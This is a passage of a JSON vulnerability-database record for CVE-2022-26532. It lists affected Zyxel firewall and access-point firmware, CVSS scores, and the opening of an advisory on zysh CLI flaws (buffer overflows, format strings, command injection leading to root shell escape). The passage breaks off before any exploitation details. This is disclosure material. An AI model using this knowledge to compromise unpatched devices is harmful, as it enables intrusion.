              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "1.33",
                        "versionStartIncluding": "1.00",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:1.33:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:1.33:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:1.33:patch2:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:1.33:patch3:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:1.33:patch4:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nsg50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nxc2500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.10\\(aaig.3\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nxc2500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nxc5500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.10\\(aaos.3\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nxc5500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nap203_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abfa.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nap203:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nap303_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abex.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nap303:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nap353_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abey.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nap353:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa50ax_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abyw.5\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa50ax:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa55axe_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abzl.5\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa55axe:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa90ax_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.27\\(accv.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa90ax:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa110ax_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abtg.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa110ax:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa210ax_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abtd.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa210ax:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa1123-ac-hd_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abin.6\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa1123-ac-hd:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa1123-ac-pro_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abhd.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa1123-ac-pro:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa1123acv3_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abvt.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa1123acv3:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa1302-ac_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abku.6\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa1302-ac:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa5123-ac-hd_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abim.6\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa5123-ac-hd:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac500h_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abwa.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac500h:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abvs.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac5302d-s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.10\\(abfh.10\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac5302d-s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac5302d-sv2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abvz.6\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac5302d-sv2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6103d-i_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(aaxh.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6103d-i:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6303d-s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abgl.6\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6303d-s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6502d-e_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(aasd.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6502d-e:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6502d-s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(aase.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6502d-s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6503d-s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(aasf.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6503d-s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6553d-s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(aasg.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6553d-s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6552d-s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abio.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6552d-s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wax510d_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abtf.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wax510d:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wax610d_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abte.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wax610d:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wax630s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abzd.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wax630s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wax650s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abrm.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wax650s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-26532"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Marco Ivaldi",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "167464"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3999"
          }
        ],
        "trust": 0.7
      },
      "cve": "CVE-2022-26532",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.2,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 3.9,
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "author": "VULMON",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.2,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-26532",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "HIGH",
                "trust": 0.1,
                "userInteractionRequired": null,
                "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "LOCAL",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 7.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.8,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2022-26532",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2022-26532",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202205-3999",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-26532",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-26532"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-26532"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-26532"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3999"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A argument injection vulnerability in the \u0027packet-trace\u0027 CLI command of Zyxel USG/ZyWALL series firmware versions 4.09 through 4.71, USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware versions 4.32 through 5.21, VPN series firmware versions 4.30 through 5.21, NSG series firmware versions 1.00 through 1.33 Patch 4, NXC2500 firmware version 6.10(AAIG.3) and earlier versions, NAP203 firmware version 6.25(ABFA.7) and earlier versions, NWA50AX firmware version 6.25(ABYW.5) and earlier versions, WAC500 firmware version 6.30(ABVS.2) and earlier versions, and WAX510D firmware version 6.30(ABTF.2) and earlier versions, that could allow a local authenticated attacker to execute arbitrary OS commands by including crafted arguments to the CLI command. --[ HNS-2022-02 - HN Security Advisory - https://security.humanativaspa.it/\n\n* Title: Multiple vulnerabilities in Zyxel zysh\n* Products: Zyxel firewalls, AP controllers, and APs\n* Author: Marco Ivaldi \u003cmarco.ivaldi@hnsecurity.it\u003e\n* Date: 2022-06-07\n* CVE Names and Vendor CVSS Scores:\n  CVE-2022-26531: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H (6.1)\n  CVE-2022-26532: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (7.8)\n* Advisory URLs:\n  https://github.com/hnsecurity/vulns/blob/main/HNS-2022-02-zyxel-zysh.txt\n  https://www.zyxel.com/support/multiple-vulnerabilities-of-firewalls-AP-controllers-and-APs.shtml\n\n\n--[ 0 - Table of contents\n\n1 - Summary\n2 - Background\n3 - Vulnerabilities\n4 - Analysis\n    4.1 - Buffer overflows in the \"configure terminal \u003e diagnostic\" command\n    4.2 - Buffer overflow in the \"debug\" command\n    4.3 - Buffer overflow in the \"ssh\" command\n    4.4 - Format string bugs in the \"extension\" argument of some commands\n    4.5 - OS command injection in the \"packet-trace\" command\n5 - Exploitation\n    5.1 - Buffer overflows\n    5.2 - Format string bugs\n    5.3 - OS command injection\n6 - Affected products\n7 - Remediation\n8 - Disclosure timeline\n9 - References\n\n\n--[ 1 - Summary\n\n\"We live on a placid island of ignorance in the midst of black seas of\ninfinity, and it was not meant that we should voyage far.\"\n                               -- H. P. Lovecraft, The Call of Cthulhu\n\nWe have identified multiple security vulnerabilities in the zysh binary\nthat implements the command-line interface (CLI) on a wide range of Zyxel\nproducts, including their security appliances such as those in the Unified\nSecurity Gateway (USG) product line:\n\n* Multiple stack-based buffer overflows in the code responsible for\n  handling diagnostic tests (\"configure terminal \u003e diagnostic\" command). \n* A stack-based buffer overflow in the \"debug\" command. \n* A stack-based buffer overflow in the \"ssh\" command. \n* Multiple format string bugs in the \"extension\" argument of the \"ping\",\n  \"ping6\", \"traceroute\", \"traceroute6\", \"nslookup\", and \"nslookup6\"\n  commands. \n* An OS command injection vulnerability in the \"packet-trace\" command. \n\nWe demonstrated the possibility to exploit the format string bugs and the\nOS command injection vulnerability to escape the restricted shell\nenvironment and achieve arbitrary command execution on the underlying\nembedded Linux OS, respectively as regular user and as root. \n\n\n--[ 2 - Background\n\nThe zysh binary is a restricted shell that implements the command-line\ninterface (CLI) on multiple Zyxel [0] products. All regular user accounts\nhave an /etc/passwd entry similar to the following:\n\nadmin:x:10007:10000:Administration account...:/etc/zyxel/ftp:/bin/zysh\n\nOnly the root user and the reserved debug account, disabled by default,\nhave access to a proper bash shell:\n\nroot:x:0:0:root\u0026admin\u0026120\u0026120\u0026480\u0026480\u00261\u00260:/root:/bin/bash\n... \ndebug:!:0:0:Debug Account:/root:/bin/bash\n\nThe Zyxel CLI can be accessed via SSH as follows:\n\nraptor@blumenkraft ~ % ssh \u003cREDACTED\u003e -l admin\n(admin@\u003cREDACTED\u003e) Password:\nRouter\u003e # hello zysh!\n\nOn our Zyxel USG20-VPN test device, the CLI can also be accessed via Telnet\n(not enabled by default) or via the so-called Web Console, implemented with\nWebSockets, that is reachable with a web browser after authentication, at a\nURL such as the following:\n\nhttps://\u003cREDACTED\u003e/webconsole/\n\nIn the context of a wider audit of the security posture of Zyxel devices\n[1], we decided to audit zysh with the primary goal of escaping the\nrestricted shell environment and executing arbitrary commands on the\nunderlying embedded Linux OS. It is pretty large for a dynamically-linked,\nstripped binary (~19MB) and it makes plenty of unsafe API function calls,\nwhich makes it an interesting target. \n\n\n--[ 3 - Vulnerabilities\n\nDuring our audit of the zysh binary, we identified the following\nvulnerabilities:\n\n* Multiple stack-based buffer overflows in the code responsible for\n  handling diagnostic tests (\"configure terminal \u003e diagnostic\" command). \n* A stack-based buffer overflow in the \"debug\" command. \n* A stack-based buffer overflow in the \"ssh\" command. \n* Multiple format string bugs in the \"extension\" argument of the \"ping\",\n  \"ping6\", \"traceroute\", \"traceroute6\", \"nslookup\", and \"nslookup6\"\n  commands. \n* An OS command injection vulnerability in the \"packet-trace\" command. \n\nAll buffer overflows can be triggered only by admin users, while the format\nstring bugs and the command injection vulnerability are exploitable by\nauthenticated users of either admin or limited-admin type. \n\n\n--[ 4 - Analysis\n\nTo follow along with our 